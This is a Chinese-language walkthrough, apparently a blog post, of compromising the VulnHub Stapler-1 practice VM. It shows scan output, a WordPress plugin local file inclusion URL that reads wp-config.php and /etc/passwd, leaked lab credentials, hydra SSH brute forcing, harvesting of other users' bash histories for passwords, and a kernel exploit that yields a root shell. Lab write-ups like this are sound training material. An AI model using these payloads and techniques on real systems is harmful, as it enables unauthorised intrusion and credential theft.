• VulnHub靶场篇11-Stapler-1


    靶机地址:Stapler-1 ~ VulnHub
    难易程度:3.0 / 10.0

    文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!

    摘要:端口扫描后,分别在21、22、80等端口获得了一些提示及用户名信息,再访问12380端口,通过nikto扫描到一些目录,其中/blogblog是一个wordpress框架,前往wp-content目录下查看相关插件,其中advanced-video-embed 存在文件包含漏洞,读取到/etc/passwd文件和wp-config.php的mysql信息,获取到一些用户名和密码信息后,使用hydra跑出账号密码信息,获取到低权限。之后可以通过系统漏洞进行提权或者根据提示找到peter的密码,登录进peter用户直接sudo。

    待完善地方:相关文件的处理命令|cut awk等、编写bash脚本语言自动化执行指定命令

    主机探测&端口扫描

    靶机ip为:192.168.1.10

    端口扫描结果:

    hh@Kali2020:~$ sudo nmap -sS -T5 -p- --open 192.168.1.10
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 11:46 CST
    Nmap scan report for red.initech (192.168.1.10)
    Host is up (0.00019s latency).
    Not shown: 65523 filtered ports, 4 closed ports
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT      STATE SERVICE
    21/tcp    open  ftp
    22/tcp    open  ssh
    53/tcp    open  domain
    80/tcp    open  http
    139/tcp   open  netbios-ssn
    666/tcp   open  doom
    3306/tcp  open  mysql
    12380/tcp open  unknown
    MAC Address: 00:0C:29:77:E0:EA (VMware)
    Nmap done: 1 IP address (1 host up) scanned in 54.08 seconds
    

    信息搜集

    80端口

    没有信息,去其他端口搜集信息

    22端口

    没密码,但是的到用户名 Barry

    12380端口

    1. 这里显示unknown,重新进行详细地扫描
    hhh@Kali2020:~$ sudo nmap -A -p 12380 -sV -sS 192.168.1.10
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-03 13:23 CST
    Nmap scan report for red.initech (192.168.1.10)
    Host is up (0.00023s latency).
    
    PORT      STATE SERVICE VERSION
    12380/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Tim, we need to-do better next year for Initech
    MAC Address: 00:0C:29:77:E0:EA (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
    Network Distance: 1 hop
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.23 ms red.initech (192.168.1.10)
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds
    
    

    显示是Apache httpd 2.4.18 ((Ubuntu)),浏览器访问成功

    1. 使用nikto扫描,得到信息该网站使用SSL,三个目录
    hhh@Kali2020:~$ nikto -h 192.168.1.10:12380
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.1.10
    + Target Hostname:    192.168.1.10
    + Target Port:        12380
    ---------------------------------------------------------------------------
    + SSL Info:        Subject:  /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
                       Ciphers:  ECDHE-RSA-AES256-GCM-SHA384
                       Issuer:   /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
    + Start Time:         2021-02-03 13:02:03 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
    + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
    + The site uses SSL and Expect-CT header is not present.
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
    + "robots.txt" contains 2 entries which should be manually viewed.
    + Hostname '192.168.1.10' does not match certificate's names: Red.Initech
    + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
    + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
    + Uncommon header 'x-ob_mode' found, with contents: 1
    + OSVDB-3233: /icons/README: Apache default file found.
    + /phpmyadmin/: phpMyAdmin directory found
    + 8071 requests: 0 error(s) and 15 item(s) reported on remote host
    + End Time:           2021-02-03 13:04:00 (GMT8) (117 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    1. 访问三个目录
    https://192.168.1.10:12380/admin112233
    有提示信息:
    This could of been a BeEF-XSS hook ;)
    
    https://192.168.1.10:12380/blogblog
    是一个博客
    
    https://192.168.1.10:12380/phpmyadmin
    登录界面
    
    1. 从/blogblog目录入手,使用dirb进行扫描,是一个wordpress框架
    hhh@Kali2020:~$ dirb https://192.168.1.10:12380/blogblog
    
    ---- Scanning URL: https://192.168.1.10:12380/blogblog/ ----
    + https://192.168.1.10:12380/blogblog/index.php (CODE:301|SIZE:0)
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-admin/
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-content/
    ==> DIRECTORY: https://192.168.1.10:12380/blogblog/wp-includes/
    

    权限获取

    途径一:Plugin漏洞

    1. 先进目录下查看插件列表,点进去每个插件,有个readme.md文件,可以看到版本信息
    https://192.168.1.10:12380/blogblog/wp-content/plugins/
    
    1. 对于 advanced-video-embed 插件,google其漏洞
      WordPress Plugin Advanced Video 1.0 - Local File Inclusion
      是一个本地文件包含漏洞,根据其提示信息进行操作
    2. 访问wp-config配置文件
    https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
    

    访问后会在当前页面显示一个URL,点击去有一个.jpeg文件,将其下载下来,就可以看到wp-config.php文件信息

    wget --no-check-certificate  https://192.168.1.10:12380/blogblog/wp-content/uploads/974197914.jpeg
    

    --no-check-certificate:表示不检查证书,针对https的网站文件

    可以看到该数据库的root密码信息 root : plbkac

    hhh@Kali2020:~$ cat 974197914.jpeg 
    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'wordpress');
    /** MySQL database username */
    define('DB_USER', 'root');
    /** MySQL database password */
    define('DB_PASSWORD', 'plbkac');
    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8mb4');
    
    1. 访问/etc/passwd文件,类似上一步的操作,可以查看到文件内容
    https://192.168.1.10:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd
    

    passwd部分文件内容

    CCeaser:x:1012:1012::/home/CCeaser:/bin/dash
    JKanode:x:1013:1013::/home/JKanode:/bin/bash
    CJoo:x:1014:1014::/home/CJoo:/bin/bash
    Eeth:x:1015:1015::/home/Eeth:/usr/sbin/nologin
    LSolum2:x:1016:1016::/home/LSolum2:/usr/sbin/nologin
    JLipps:x:1017:1017::/home/JLipps:/bin/sh
    jamie:x:1018:1018::/home/jamie:/bin/sh
    Sam:x:1019:1019::/home/Sam:/bin/zsh
    Drew:x:1020:1020::/home/Drew:/bin/bash
    jess:x:1021:1021::/home/jess:/bin/bash
    SHAY:x:1022:1022::/home/SHAY:/bin/bash
    Taylor:x:1023:1023::/home/Taylor:/bin/sh
    mel:x:1024:1024::/home/mel:/bin/bash
    kai:x:1025:1025::/home/kai:/bin/sh
    zoe:x:1026:1026::/home/zoe:/bin/bash
    NATHAN:x:1027:1027::/home/NATHAN:/bin/bash
    www:x:1028:1028::/home/www:
    
    1. /etc/passwd有用信息整合下来
      cut指令Linux cut命令
    cat 1097971703.jpeg | grep /bin/bash | cut -d ":" -f1 > user.txt
    

    -d:自定义分隔符,这里以 : 冒号为分隔符
    -f1:指定显示哪第一块区域

    1. hydra跑处账号密码信息
    hydra 192.168.1.10 ssh -L user.txt -p plbkac
    

    成功跑出zoe和plbkac的用户密码信息

    1. 登录ssh
    ssh zoe@192.168.1.10
    

    权限提升

    方法一:切换到peter用户

    遍历/home目录下各个文件,发现peter文件夹不太一样

    zoe@red:/home$ ls -alhR
    

    peter文件夹信息:

    ./peter:
    total 72K
    drwxr-xr-x  3 peter peter 4.0K Jun  3  2016 .
    drwxr-xr-x 32 root  root  4.0K Jun  4  2016 ..
    -rw-------  1 peter peter    1 Jun  5  2016 .bash_history
    -rw-r--r--  1 peter peter  220 Jun  3  2016 .bash_logout
    -rw-r--r--  1 peter peter 3.7K Jun  3  2016 .bashrc
    drwx------  2 peter peter 4.0K Jun  6  2016 .cache
    -rw-r--r--  1 peter peter  675 Jun  3  2016 .profile
    -rw-r--r--  1 peter peter    0 Jun  3  2016 .sudo_as_admin_successful
    -rw-------  1 peter peter  577 Jun  3  2016 .viminfo
    -rw-rw-r--  1 peter peter  39K Jun  3  2016 .zcompdump
    ls: cannot open directory './peter/.cache': Permission denied
    

    根据提示信息接下来尝试登录进peter用户

    在检查到各个用户的.bash_history文件,使用bash语言,先将该目录下的所有文件名写入数组内,再去执行下面一行命令,重复30次,每次执行cd pwd cat cd 四个命令,可以看到 JKanode 的.bahs_history 文件内容不同,分析出peter的密码为 JZQuyIN5

    zoe@red:/home$ array=(AParnell Drew elly jamie JKanode LSolum mel peter SHAY Taylor CCeaser DSwanger ETollefson JBare JLipps LSolum2 MFrei RNunemaker SHayslett www CJoo Eeth IChadwick jess kai MBassin NATHAN Sam SStroud zoe)
    zoe@red:/home$ for i in {0..29}; do cd ./${array[$i]}; pwd; cat .bash_history; cd ../; done
    

    部分信息:

    /home/AParnell
    exit
    /home/Drew
    exit
    /home/elly
    exit
    /home/jamie
    top
    ps aux
    exit
    /home/JKanode
    id
    whoami
    ls -lah
    pwd
    ps aux
    sshpass -p thisimypassword ssh JKanode@localhost
    apt-get install sshpass
    sshpass -p JZQuyIN5 peter@localhost
    ps -ef
    top
    kill -9 3747
    exit
    /home/LSolum
    exit
    

    登录进peter用户

    su peter
    sudo cat /root/flag.txt
    

    方法二:通过系统漏洞提权

    查看靶机的信息 Ubuntu 16.04|Linux Kernel 4.4.0

    root@red:~# lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 16.04 LTS
    Release:        16.04
    Codename:       xenial
    root@red:~# uname -a
    Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
    

    可以google搜索相关漏洞,也可以使用les.sh工具列举可能的漏洞

    这里在exploit-db上搜索了 Linux Kernel 4.4 Ubuntu 16.04,最后选择了一下的漏洞

    inux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation

    根据其提示,先将文件通过python搭建的简易http服务传递到靶机上(python搭建简易http服务器到靶机的操作在前几台靶机中都有体现)

    赋予权限,执行compile.sh文件,再执行./doubleput文件,最后成功提权

    zoe@red:~$ ./compile.sh 
    
    zoe@red:~$ ./doubleput 
    starting writev
    woohoo, got pointer reuse
    writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
    suid file detected, launching rootshell...
    we have root privs now...
    root@red:~# id
    uid=0(root) gid=0(root) groups=0(root),1026(zoe)
    

    总结

    1. SSL
    2. wordpress-plugin漏洞
    3. 字符串操作|awk命令|cut命令
    4. ls -R命令
    5. 编写bash脚本语言自动化搜索

    参考

    Vulnhub Stapler VM Walkthrough – DotNetRussell

    No.10-VulnHub-Stapler: 1-Walkthrough渗透学习(大余)

  • 相关阅读:
    javascript函数作用域及this指向详解
    使用div模拟textarea,实现文本输入框高度自适应(附:js控制textarea实现文本输入框高度自适应)
    css限制单行文本输入,超出部分使用...替换
    解决sea.js引用jQuery提示$ is not a function的问题
    js实用代码段(持续更新)
    xml中,button改变背景颜色方法
    Java中的import
    Unable to resolve target 'android-XX'的问题解决
    关于打开Eclipse时出现eclipse failed to create the java virtual machine与locking is not possible in the directory问题的解决
    Android SDK目录结构和工具介绍
  • 原文地址:https://www.cnblogs.com/labster/p/14377517.html
Copyright © 2020-2023  润新知